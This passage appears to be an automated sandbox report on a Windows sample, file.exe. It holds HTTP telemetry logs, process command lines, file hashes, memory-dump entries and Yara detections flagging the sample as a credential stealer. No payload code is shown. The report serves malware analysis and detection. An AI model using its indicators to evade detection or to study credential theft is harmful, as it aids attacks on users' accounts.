                                                                                                                                                                                                                            2024-11-06 13:39:51 UTC1369INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 4d 61 63 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" /> <F T


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            148192.168.2.56202213.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:51 UTC192OUTGET /rules/rule703001v1s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:51 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:51 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1406
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BEB16F27E"
                                                                                                                                                                                                                            x-ms-request-id: e18da7de-b01e-001e-6e68-2e0214000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133951Z-15869dbbcc6vr5dxhC1DFWqn6400000001fg000000000g28
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:51 UTC1406INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            149192.168.2.56202413.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:51 UTC192OUTGET /rules/rule700751v1s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:51 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:51 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1414
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BE03B051D"
                                                                                                                                                                                                                            x-ms-request-id: 55d4e3a1-401e-00a3-7d5f-2e8b09000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133951Z-17df447cdb5w28bthC1DFWgb6400000002kg00000000gt4e
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:51 UTC1414INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                            Start time:08:38:55
                                                                                                                                                                                                                            Start date:06/11/2024
                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                                            Imagebase:0xda0000
                                                                                                                                                                                                                            File size:3'221'504 bytes
                                                                                                                                                                                                                            MD5 hash:7194B1BD9A6FA2BB6F223519917B3FB4
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2109025654.00000000057B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2047895293.00000000057B6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                                            Start time:08:39:24
                                                                                                                                                                                                                            Start date:06/11/2024
                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                                            Imagebase:0x7ff715980000
                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                                                            Start time:08:39:25
                                                                                                                                                                                                                            Start date:06/11/2024
                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=2000,i,14035377604551262520,15741905147820975122,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                            Imagebase:0x7ff715980000
                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                                                            Start time:08:39:28
                                                                                                                                                                                                                            Start date:06/11/2024
                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                                            Imagebase:0x7ff715980000
                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                                                            Start time:08:39:29
                                                                                                                                                                                                                            Start date:06/11/2024
                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1984,i,5164532160566674364,7948949956140037157,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                            Imagebase:0x7ff715980000
                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Reset < >
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000003.2265417496.0000000000D77000.00000004.00000020.00020000.00000000.sdmp, Offset: 00D79000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_3_d79000_file.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: d
                                                                                                                                                                                                                              • API String ID: 0-2564639436
                                                                                                                                                                                                                              • Opcode ID: cb1b982fbc46dc85d15d24de39c16dc555c116f4eaf2309b522532ca44dcbf6a
                                                                                                                                                                                                                              • Instruction ID: 244dbfbd293482d17cda2f3fb68dd6112b6355e6a197b539f169d1a1dab18e1c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb1b982fbc46dc85d15d24de39c16dc555c116f4eaf2309b522532ca44dcbf6a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A8A1C96245E3C14FC7178B705C7A681BFB0AE27210B1E95EFC4C5CE4A3E249588ACB67
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000003.2265417496.0000000000D77000.00000004.00000020.00020000.00000000.sdmp, Offset: 00D77000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_3_d79000_file.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: d
                                                                                                                                                                                                                              • API String ID: 0-2564639436
                                                                                                                                                                                                                              • Opcode ID: cb1b982fbc46dc85d15d24de39c16dc555c116f4eaf2309b522532ca44dcbf6a
                                                                                                                                                                                                                              • Instruction ID: 244dbfbd293482d17cda2f3fb68dd6112b6355e6a197b539f169d1a1dab18e1c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb1b982fbc46dc85d15d24de39c16dc555c116f4eaf2309b522532ca44dcbf6a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A8A1C96245E3C14FC7178B705C7A681BFB0AE27210B1E95EFC4C5CE4A3E249588ACB67